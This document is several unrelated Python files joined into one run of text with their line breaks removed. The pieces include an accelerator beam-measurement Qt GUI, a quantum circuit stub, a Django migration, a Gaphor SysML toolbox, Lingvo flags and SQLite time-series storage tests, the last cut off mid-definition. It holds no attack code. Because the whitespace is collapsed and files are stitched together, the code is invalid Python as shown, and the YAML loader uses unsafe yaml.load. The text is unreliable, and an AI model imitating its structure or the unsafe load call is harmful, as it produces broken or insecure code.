# orbit correction dlg self.bbadlg = None pass def close(self): if self.corbitdlg: self.corbitdlg.close() if self.bbadlg: self.bbadlg.close() def updateDeadElementPlots(self): for w in self.mdiarea.subWindowList(): for e in self.deadelems: if e.name not in w.data.names(): continue w.data.disable(e.name) def measBeta(self): p = ApMdiSubPlot(live=False) p.setAttribute(Qt.WA_DeleteOnClose) curves = [p.aplot.curve1, p.aplot.addCurve(), # x and xref p.aplot.addCurve(), p.aplot.addCurve() # y and yref ] for curv in curves: curv.setStyle(Qwt.QwtPlotCurve.Lines) curves[0].setPen(QPen(Qt.red, 1.3, Qt.DashLine)) curves[0].setZ(curves[1].z() + 2) curves[1].setPen(QPen(Qt.red, 1.5)) curves[2].setPen(QPen(Qt.blue, 1.3, Qt.DashLine)) curves[2].setZ(curves[3].z() + 2) curves[2].setSymbol(Qwt.QwtSymbol(Qwt.QwtSymbol.Triangle, QBrush(Qt.blue), QPen(Qt.black, 1), QSize(8, 8))) curves[3].setPen(QPen(Qt.blue, 1.5)) #p.aplot.curve1.setStyle(Qwt.QwtPlotCurve.) #p.setWindowTitle("[%s.%s] %s %s" % (mach, lat, title, fld)) self.mdiarea.addSubWindow(p) #print "Show" p.show() #plots.append(p) qs = ap.getGroupMembers(['C20', 'QUAD']) + \ ap.getGroupMembers(['C21', 'QUAD']) xl = min([q.sb for q in qs]) xr = max([q.se for q in qs]) s, btx, bty = [], [], [] try: betaref = ap.getBeta([q.name for q in qs], spos=True) curves[1].setData(betaref[:,-1], betaref[:,0], None) curves[3].setData(betaref[:,-1], betaref[:,1], None) fullmagprof = ap.machines.getLattice().getBeamlineProfile() magprof = [v for v in fullmagprof if max(v[0]) > xl \ and min(v[0]) < xr] p.aplot.setMagnetProfile(magprof) p.wid.autoScaleXY() p.aplot.replot() for q in qs[:3]: tbeta, tk1, tnu = ap.measBeta(q, full=True) #print tk1, tnu, tbeta QApplication.processEvents() s.append(tbeta[0,-1]) btx.append(tbeta[0,0]) bty.append(tbeta[0,1]) curves[0].setData(s, btx, None) curves[2].setData(s, bty, None) p.wid.autoScaleXY() p.aplot.replot() _logger.info("beta measured for {0} " \ "(s={1}, btx={2}, bty={3})".format( q.name, s[-1], btx[-1], bty[-1])) except: _logger.error("error at measBeta") raise _logger.info("finished beta measurement.") #if magprof: p.wid.setMagnetProfile(magprof) #self.connect(p, SIGNAL("destroyed()"), self.subPlotDestroyed) #print "update the plot" #p.updatePlot() # set the zoom stack #print "autozoom" #p.aplot.setErrorBar(self.error_bar) def measDispersion(self): p = ApMdiSubPlot(live=False) p.setAttribute(Qt.WA_DeleteOnClose) curves = [p.aplot.curve1, p.aplot.addCurve(), # x and xref p.aplot.addCurve(), p.aplot.addCurve() # y and yref ] for curv in curves: curv.setStyle(Qwt.QwtPlotCurve.Lines) curves[0].setPen(QPen(Qt.red, 1.3, Qt.DashLine)) curves[1].setPen(QPen(Qt.red, 1.5)) curves[2].setPen(QPen(Qt.blue, 1.3, Qt.DashLine)) curves[3].setPen(QPen(Qt.blue, 1.5)) curves[2].setSymbol(Qwt.QwtSymbol(Qwt.QwtSymbol.Triangle, QBrush(Qt.blue), QPen(Qt.black, 1), QSize(8, 8))) #p.aplot.curve1.setStyle(Qwt.QwtPlotCurve.) #p.setWindowTitle("[%s.%s] %s %s" % (mach, lat, title, fld)) self.mdiarea.addSubWindow(p) #print "Show" p.show() #plots.append(p) #bpms = ap.getGroupMembers(['C20', 'BPM']) + \ # ap.getGroupMembers(['C21', 'BPM']) bpms = ap.getElements('BPM') xl = min([q.sb for q in bpms]) xr = max([q.se for q in bpms]) s, btx, bty = [], [], [] try: etaref = ap.getEta([q.name for q in bpms], spos=True) curves[1].setData(etaref[:,-1], etaref[:,0], None) curves[3].setData(etaref[:,-1], etaref[:,1], None) fullmagprof = ap.machines.getLattice().getBeamlineProfile() magprof = [v for v in fullmagprof if max(v[0]) > xl \ and min(v[0]) < xr] p.aplot.setMagnetProfile(magprof) #p.wid.autoScaleXY() p.aplot.replot() disp = ap.measDispersion(bpms, verbose=2) curves[0].setData(disp[:,-1], disp[:,0], None) curves[2].setData(disp[:,-1], disp[:,1], None) p.wid.autoScaleXY() p.aplot.replot() _logger.info("dispersion eta measured") except: _logger.error("error at measEta") raise _logger.info("finished eta measurement.") #if magprof: p.wid.setMagnetProfile(magprof) #self.connect(p, SIGNAL("destroyed()"), self.subPlotDestroyed) #print "update the plot" #p.updatePlot() # set the zoom stack #print "autozoom" #p.aplot.setErrorBar(self.error_bar) def runBba(self, bpms): """create local bump""" inp = {'bpms': [], 'quads': [], 'cors': [], 'quad_dkicks': [], 'cor_dkicks': []} for bpm in bpms: inp['bpms'].extend([(bpm, 'x'), (bpm, 'y')]) quad = ap.getClosest(bpm, 'QUAD') inp['quads'].extend([(quad, 'k1'), (quad, 'k1')]) cor = ap.getNeighbors(bpm, 'HCOR', 1)[0] inp['cors'].append((cor, 'x')) cor = ap.getNeighbors(bpm, 'VCOR', 1)[0] inp['cors'].append((cor, 'y')) inp['quad_dkicks'].extend([1e-2, 1e-2]) inp['cor_dkicks'].extend([np.linspace(-6e-5, 6e-5, 4), np.linspace(-6e-5, 6e-5, 4)]) if self.bbadlg is None: #print self.obtdata.elem_names # assuming BPM has both x and y, the following s are same self.bbadlg = ApBbaDlg() self.bbadlg.resize(500, 200) self.bbadlg.setWindowTitle("Beam based alignment") #self.obtxplot.plotDesiredOrbit(self.orbitx_data.golden(), # self.orbitx_data.x) #self.obtyplot.plotDesiredOrbit(self.orbity_data.golden(), # self.orbity_data.x) self.bbadlg.show() self.bbadlg.raise_() self.bbadlg.activateWindow() from cothread.catools import caget, caput print(__file__, "BBA align", caget('V:2-SR:C30-BI:G2{PH1:11}SA:X')) self.bbadlg.runAlignment(**inp)
""" Contains the QuantumCircuit class boom. """ class QuantumCircuit(object): # pylint: disable=useless-object-inheritance """ Implements a quantum circuit. - - - WRITE DOCUMENTATION HERE - - - """ def __init__(self): """ Initialise a QuantumCircuit object """ pass def add_gate(self, gate): """ Add a gate to the circuit """ pass def run_circuit(self, register): """ Run the circuit on a given quantum register """ pass def __call__(self, register): """ Run the circuit on a given quantum register """ pass
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('music', '0001_initial'), ] operations = [ migrations.CreateModel( name='Song', fields=[ ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)), ('slug', models.SlugField(unique=True)), ('publish', models.BooleanField(default=False)), ('publish_on', models.DateTimeField(blank=True, null=True)), ('title', models.CharField(max_length=200)), ('description', models.TextField(blank=True)), ('credits', models.TextField(blank=True)), ('lyrics', models.TextField(blank=True)), ('track', models.PositiveIntegerField(blank=True, null=True)), ('release', models.ForeignKey(null=True, blank=True, to='music.Release')), ], options={ 'ordering': ['title'], }, bases=(models.Model,), ), ]
def exec_after_process(app, inp_data, out_data, param_dict, tool, stdout, stderr): for name,data in out_data.items(): if name == "seq_file2": data.dbkey = param_dict['dbkey_2'] app.model.context.add( data ) app.model.context.flush() break
import yaml from box import Box def load_config(fp): return Box(yaml.load(open(fp, 'r').read()))
"""The action definition for the SysML toolbox.""" from gaphas.item import SE import gaphor.SysML.diagramitems as sysml_items import gaphor.UML.diagramitems as uml_items from gaphor import UML, diagram from gaphor.core import gettext from gaphor.diagram.diagramtoolbox import ToolboxDefinition, ToolDef from gaphor.diagram.diagramtools import PlacementTool from gaphor.SysML import sysml def namespace_config(new_item): subject = new_item.subject diagram = new_item.canvas.diagram subject.package = diagram.namespace subject.name = f"New{type(subject).__name__}" def initial_pseudostate_config(new_item): new_item.subject.kind = "initial" def history_pseudostate_config(new_item): new_item.subject.kind = "shallowHistory" def metaclass_config(new_item): namespace_config(new_item) new_item.subject.name = "Class" # Actions: ((section (name, label, icon_name, shortcut)), ...) sysml_toolbox_actions: ToolboxDefinition = ( ( gettext("General"), ( ToolDef( "toolbox-pointer", gettext("Pointer"), "gaphor-pointer-symbolic", "Escape", item_factory=None, ), ToolDef( "toolbox-line", gettext("Line"), "gaphor-line-symbolic", "l", PlacementTool.new_item_factory(diagram.general.Line), ), ToolDef( "toolbox-box", gettext("Box"), "gaphor-box-symbolic", "b", PlacementTool.new_item_factory(diagram.general.Box), SE, ), ToolDef( "toolbox-ellipse", gettext("Ellipse"), "gaphor-ellipse-symbolic", "e", PlacementTool.new_item_factory(diagram.general.Ellipse), SE, ), ToolDef( "toolbox-comment", gettext("Comment"), "gaphor-comment-symbolic", "k", PlacementTool.new_item_factory( diagram.general.CommentItem, UML.Comment ), handle_index=SE, ), ToolDef( "toolbox-comment-line", gettext("Comment line"), "gaphor-comment-line-symbolic", "<Shift>K", PlacementTool.new_item_factory(diagram.general.CommentLineItem), ), ), ), ( gettext("Blocks"), ( ToolDef( "toolbox-block", gettext("Block"), "gaphor-class-symbolic", "b", item_factory=PlacementTool.new_item_factory( sysml_items.BlockItem, sysml.Block, config_func=namespace_config ), handle_index=SE, ), ToolDef( "toolbox-package", gettext("Package"), "gaphor-package-symbolic", "p", PlacementTool.new_item_factory( uml_items.PackageItem, UML.Package, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-association", gettext("Association"), "gaphor-association-symbolic", "<Shift>A", PlacementTool.new_item_factory(uml_items.AssociationItem), ), ToolDef( "toolbox-generalization", gettext("Generalization"), "gaphor-generalization-symbolic", "<Shift>G", PlacementTool.new_item_factory(uml_items.GeneralizationItem), ), ), ), ( gettext("Internal Blocks"), ( ToolDef( "toolbox-block", gettext("Block"), "gaphor-class-symbolic", "b", item_factory=PlacementTool.new_item_factory( sysml_items.BlockItem, sysml.Block, config_func=namespace_config ), handle_index=SE, ), ToolDef( "toolbox-package", gettext("Package"), "gaphor-package-symbolic", "p", PlacementTool.new_item_factory( uml_items.PackageItem, UML.Package, config_func=namespace_config, ), handle_index=SE, ), ), ), ( gettext("Requirements"), ( ToolDef( "toolbox-requirement", gettext("Requirement"), "gaphor-requirement-symbolic", "r", item_factory=PlacementTool.new_item_factory( sysml_items.RequirementItem, sysml.Requirement, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-satisfy-dependency", gettext("Satisfy"), "gaphor-satisfy-symbolic", "<Shift>I", PlacementTool.new_item_factory(sysml_items.SatisfyItem), ), ToolDef( "toolbox-derive-reqt-dependency", gettext("Derive Reqt"), "gaphor-derive-symbolic", "<Shift>D", PlacementTool.new_item_factory(sysml_items.DeriveReqtItem), ), ToolDef( "toolbox-trace-dependency", gettext("Trace"), "gaphor-trace-symbolic", "<Shift>C", PlacementTool.new_item_factory(sysml_items.TraceItem), ), ToolDef( "toolbox-refine-dependency", gettext("Refine"), "gaphor-refine-symbolic", "<Shift>N", PlacementTool.new_item_factory(sysml_items.RefineItem), ), ToolDef( "toolbox-verify-dependency", gettext("Verify"), "gaphor-verify-symbolic", "<Shift>V", PlacementTool.new_item_factory(sysml_items.VerifyItem), ), ), ), ( gettext("Actions"), ( ToolDef( "toolbox-action", gettext("Action"), "gaphor-action-symbolic", "a", item_factory=PlacementTool.new_item_factory( uml_items.ActionItem, UML.Action, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-initial-node", gettext("Initial node"), "gaphor-initial-node-symbolic", "j", item_factory=PlacementTool.new_item_factory( uml_items.InitialNodeItem, UML.InitialNode ), handle_index=SE, ), ToolDef( "toolbox-activity-final-node", gettext("Activity final node"), "gaphor-activity-final-node-symbolic", "f", item_factory=PlacementTool.new_item_factory( uml_items.ActivityFinalNodeItem, UML.ActivityFinalNode ), handle_index=SE, ), ToolDef( "toolbox-flow-final-node", gettext("Flow final node"), "gaphor-flow-final-node-symbolic", "w", item_factory=PlacementTool.new_item_factory( uml_items.FlowFinalNodeItem, UML.FlowFinalNode ), handle_index=SE, ), ToolDef( "toolbox-decision-node", gettext("Decision/merge node"), "gaphor-decision-node-symbolic", "g", item_factory=PlacementTool.new_item_factory( uml_items.DecisionNodeItem, UML.DecisionNode ), handle_index=SE, ), ToolDef( "toolbox-fork-node", gettext("Fork/join node"), "gaphor-fork-node-symbolic", "<Shift>R", item_factory=PlacementTool.new_item_factory( uml_items.ForkNodeItem, UML.JoinNode ), handle_index=1, ), ToolDef( "toolbox-object-node", gettext("Object node"), "gaphor-object-node-symbolic", "<Shift>O", item_factory=PlacementTool.new_item_factory( uml_items.ObjectNodeItem, UML.ObjectNode, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-partition", gettext("Partition"), "gaphor-partition-symbolic", "<Shift>P", item_factory=PlacementTool.new_item_factory(uml_items.PartitionItem), handle_index=SE, ), ToolDef( "toolbox-flow", gettext("Control/object flow"), "gaphor-control-flow-symbolic", "<Shift>F", item_factory=PlacementTool.new_item_factory(uml_items.FlowItem), ), ToolDef( "toolbox-send-signal-action", gettext("Send signal action"), "gaphor-send-signal-action-symbolic", None, item_factory=PlacementTool.new_item_factory( uml_items.SendSignalActionItem, UML.SendSignalAction, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-accept-event-action", gettext("Accept event action"), "gaphor-accept-event-action-symbolic", None, item_factory=PlacementTool.new_item_factory( uml_items.AcceptEventActionItem, UML.AcceptEventAction, config_func=namespace_config, ), handle_index=SE, ), ), ), ( gettext("States"), ( ToolDef( "toolbox-state", gettext("State"), "gaphor-state-symbolic", "s", item_factory=PlacementTool.new_item_factory( uml_items.StateItem, UML.State, config_func=namespace_config ), handle_index=SE, ), ToolDef( "toolbox-initial-pseudostate", gettext("Initial Pseudostate"), "gaphor-initial-pseudostate-symbolic", "<Shift>S", item_factory=PlacementTool.new_item_factory( uml_items.PseudostateItem, UML.Pseudostate, initial_pseudostate_config, ), handle_index=SE, ), ToolDef( "toolbox-final-state", gettext("Final State"), "gaphor-final-state-symbolic", "x", item_factory=PlacementTool.new_item_factory( uml_items.FinalStateItem, UML.FinalState ), handle_index=SE, ), ToolDef( "toolbox-history-pseudostate", gettext("History Pseudostate"), "gaphor-pseudostate-symbolic", "q", item_factory=PlacementTool.new_item_factory( uml_items.PseudostateItem, UML.Pseudostate, history_pseudostate_config, ), handle_index=SE, ), ToolDef( "toolbox-transition", gettext("Transition"), "gaphor-transition-symbolic", "<Shift>T", item_factory=PlacementTool.new_item_factory(uml_items.TransitionItem), ), ), ), ( gettext("Use Cases"), ( ToolDef( "toolbox-use-case", gettext("Use case"), "gaphor-use-case-symbolic", "u", item_factory=PlacementTool.new_item_factory( uml_items.UseCaseItem, UML.UseCase, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-actor", gettext("Actor"), "gaphor-actor-symbolic", "t", item_factory=PlacementTool.new_item_factory( uml_items.ActorItem, UML.Actor, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-use-case-association", gettext("Association"), "gaphor-association-symbolic", "<Shift>B", item_factory=PlacementTool.new_item_factory(uml_items.AssociationItem), ), ToolDef( "toolbox-include", gettext("Include"), "gaphor-include-symbolic", "<Shift>U", item_factory=PlacementTool.new_item_factory(uml_items.IncludeItem), ), ToolDef( "toolbox-extend", gettext("Extend"), "gaphor-extend-symbolic", "<Shift>X", item_factory=PlacementTool.new_item_factory(uml_items.ExtendItem), ), ), ), )
# coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Flag definition for the setup run-time options. Flag support needs to be defined outside of the parameter file as the parameter file get imported in the trainer main and flag definitions have to be in files imported prior to the start of main to be effective as command-line flags. """ from lingvo import compat as tf tf.flags.DEFINE_string("feature_neighborhood_train_path", None, "Required glob of training files.") tf.flags.DEFINE_string("feature_neighborhood_dev_path", None, "Required glob of dev files.") tf.flags.DEFINE_string("feature_neighborhood_test_path", None, "Required glob of test files.") tf.flags.DEFINE_string("input_symbols", None, "Required path to input_symbols.") tf.flags.DEFINE_string("output_symbols", None, "Required path to output_symbols.") tf.flags.DEFINE_float("learning_rate", 0.001, "Learning rate") tf.flags.DEFINE_boolean("append_eos", True, "Append </s> symbol.") tf.flags.DEFINE_integer("batch_size", 32, "Batch size.") tf.flags.DEFINE_integer("max_neighbors", 30, "Maximum number of neighbors.") tf.flags.DEFINE_integer("max_pronunciation_len", 40, "Maximum padded length of pronunciations.") tf.flags.DEFINE_integer("max_spelling_len", 20, "Maximum padded length of spellings.") tf.flags.DEFINE_boolean("neigh_use_tpu", False, "Is this model training on TPU?") tf.flags.DEFINE_boolean("split_output_on_space", False, "Do we split output tokens on space or by character?")
import unittest from luna.datatypes.dimensional import DataTimeSeries, DataTimePoint, PhysicalDataTimePoint, PhysicalDataTimeSlot, StreamingDataTimeSeries from luna.datatypes.dimensional import * from luna.common.exceptions import InputException, StorageException from luna.spacetime.time import dt, TimeSlotSpan from luna.datatypes.dimensional import TimePoint, Point, PhysicalData from luna.sensors import PhysicalDataTimeSensor from luna.storages.sqlite import sensor_storage, storage import json # TODO: this should be a generic storage test system, which should be then applied # to the various modules (that can be write or read only) #------------------------------------ # Logging #------------------------------------ # Enable only critical logging in unit tests by default logging.basicConfig(level=logging.CRITICAL) logger = logging.getLogger("luna") #------------------------------------ # Define demo sensor #------------------------------------ class VolumetricSensorV1(PhysicalDataTimeSensor): # Assign unique type_ID to this sensor type type_ID = 5 # Set Points expected lables Points_data_labels = ['flowrate_m3s'] # Set Slots operators Slots_data_labels = ['flowrate_m3s_AVG', 'flowrate_m3s_MIN', 'flowrate_m3s_MAX', 'volume_m3_TOT'] # Set validity region span for points Points_validity_region = TimeSlot(span='1m') # Fixed timezone: timezone = "Europe/Rome" #------------------------------------ # Sensor Storage Tests #------------------------------------ class test_sqlite_sensor_storage(unittest.TestCase): def setUp(self): pass def test_Init(self): _ = sensor_storage.DataTimeSeriesSQLiteStorage(in_memory=True) def test_PutGet_DataTimePoints(self): dataTimeSeriesSQLiteStorage = sensor_storage.DataTimeSeriesSQLiteStorage(in_memory=True) # Generate 10 points DataTimeSeries with flowrate sensor dataTimeSeries = DataTimeSeries() for i in range(10): data = PhysicalData( labels = ['flowrate_m3s'], values = [20.6+i] ) physicalDataTimePoint = PhysicalDataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries.append(physicalDataTimePoint) # Generate 10 points DataTimeSeries with light sensor dataTimeSeries_light = DataTimeSeries() for i in range(10): data = PhysicalData( labels = ['light_pct'], values = [60.6+i] ) physicalDataTimePoint = PhysicalDataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries_light.append(physicalDataTimePoint) # Test put data without sensor (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test volumetric sensor volumetricSensorV1_1 = VolumetricSensorV1('lu65na') volumetricSensorV1_2 = VolumetricSensorV1('lu34na') # Test labels inconsistency with self.assertRaises(InputException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries_light, sensor=volumetricSensorV1_1) # Test put data with sensor and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1) # Test get with sensor and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, cached=True) # Test put data with sensor and right to create structure AND get with sensor and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1, can_initialize=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, cached=True) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_2, cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) def test_PutGet_DataTimeSlots(self): dataTimeSeriesSQLiteStorage = sensor_storage.DataTimeSeriesSQLiteStorage(in_memory=True) # Generate 10 slots DataTimeSeries with flowrate sensor aggregated data dataTimeSeries = DataTimeSeries() for i in range(10): data = PhysicalData(labels = ['flowrate_m3s_AVG', 'flowrate_m3s_MIN', 'flowrate_m3s_MAX', 'volume_m3_TOT'], values = [20.6+i,20.6+i,20.6+i,20.6+i] ) physicalDataTimeSlot = PhysicalDataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data=data, span=TimeSlotSpan('60s')) dataTimeSeries.append(physicalDataTimeSlot) # Generate 10 points DataTimeSeries with light sensor aggregated data dataTimeSeries_light = DataTimeSeries() for i in range(10): data = PhysicalData(labels = ['light_pct_AVG'], values = [20.6+i] ) physicalDataTimeSlot = PhysicalDataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data=data, span=TimeSlotSpan('60s')) dataTimeSeries_light.append(physicalDataTimeSlot) # Test put data without sensor (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test volumetric sensor volumetricSensorV1_1 = VolumetricSensorV1('lu65na') volumetricSensorV1_2 = VolumetricSensorV1('lu34na') # Test labels inconsistency with self.assertRaises(InputException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries_light, sensor=volumetricSensorV1_1) # Test put data with sensor and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1) # Test get with sensor and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, timeSlotSpan=TimeSlotSpan('60s'), cached=True) # Test put data with sensor and right to create structure AND get with sensor and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1, can_initialize=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, timeSlotSpan=TimeSlotSpan('60s'), cached=True) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_2, timeSlotSpan=TimeSlotSpan('60s'), cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, timeSlotSpan=TimeSlotSpan('60s'), cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, timeSlotSpan = TimeSlotSpan('60s'), cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Also test that if we go trough the cached streaminTimeSeries again, we get the same result: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, timeSlotSpan = TimeSlotSpan('60s')) # Check that we can compare it as is even if it is not cached: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Check that we can compare it again: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get AGAIn the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, timeSlotSpan = TimeSlotSpan('60s')) # But this time do not test any comparisons (that triggers the caching of the TimeSeries), # instead test that going trough it twice we achieve the same result (under the hood we go twice in the DB): items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # WARNING: This is specific to SLQlite and its dataTimeStream self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 2) # Now foce load te time series: out_streamingDataTimeSeries.force_load() # After force-loading, another soruce acces is performed self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) items_C = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_C) # Generating the list items_C after a force_load should not generate a new source_access self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) # Perform again the iterator check: items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # And ensure that the source accesses is still set to three self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) def tearDown(self): pass #------------------------------------ # Sensor Storage Tests #------------------------------------ class test_sqlite_storage(unittest.TestCase): def setUp(self): pass def test_Init(self): _ = storage.SQLiteStorage(in_memory=True) def test_PutGet_DataTimePoints(self): dataTimeSeriesSQLiteStorage = storage.SQLiteStorage(in_memory=True) # Generate 10 points DataTimeSeries with flowrate dataTimeSeries = DataTimeSeries() for i in range(10): data = json.dumps({'flowrate_m3s': 20.6+i}) dataTimePoint = DataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries.append(dataTimePoint) # Generate 10 points DataTimeSeries with light dataTimeSeries_light = DataTimeSeries() for i in range(10): data = json.dumps({'light_pct': 60.6+i}) dataTimePoint = DataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries_light.append(dataTimePoint) # Test put data without id (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test put data with id and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001') # Test get with id and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True) # Test put data with id and right to create structure AND get with id and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001', can_initialize=True) out_streamingDataTimeSeries_UTC = dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True, tz='Europe/Rome') # Check len self.assertEqual(len(out_streamingDataTimeSeries), len(dataTimeSeries)) self.assertEqual(len(out_streamingDataTimeSeries_UTC), len(dataTimeSeries)) # Quick test for i, dataPoint in enumerate(dataTimeSeries): self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].t, dataPoint.t) self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].data, dataPoint.data) # Quick test for i, dataPoint in enumerate(dataTimeSeries): self.assertEqual(out_streamingDataTimeSeries_UTC[dataPoint.t].t, dataPoint.t) self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].data, dataPoint.data) # Time Series equality does not work anymore (therefore the above quick tests) #self.assertEqual(out_streamingDataTimeSeries_UTC, dataTimeSeries) #self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000002', cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( id='0000001', from_dt = from_dt, to_dt = to_dt, cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) # Quick test for i, dataPoint in enumerate(dataTimeSeries_filtered): self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].t, dataPoint.t) self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].data, dataPoint.data) # Time Series equality does not work anymore (therefore the above quick tests) #self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) def test_PutGet_DataTimeSlots(self): 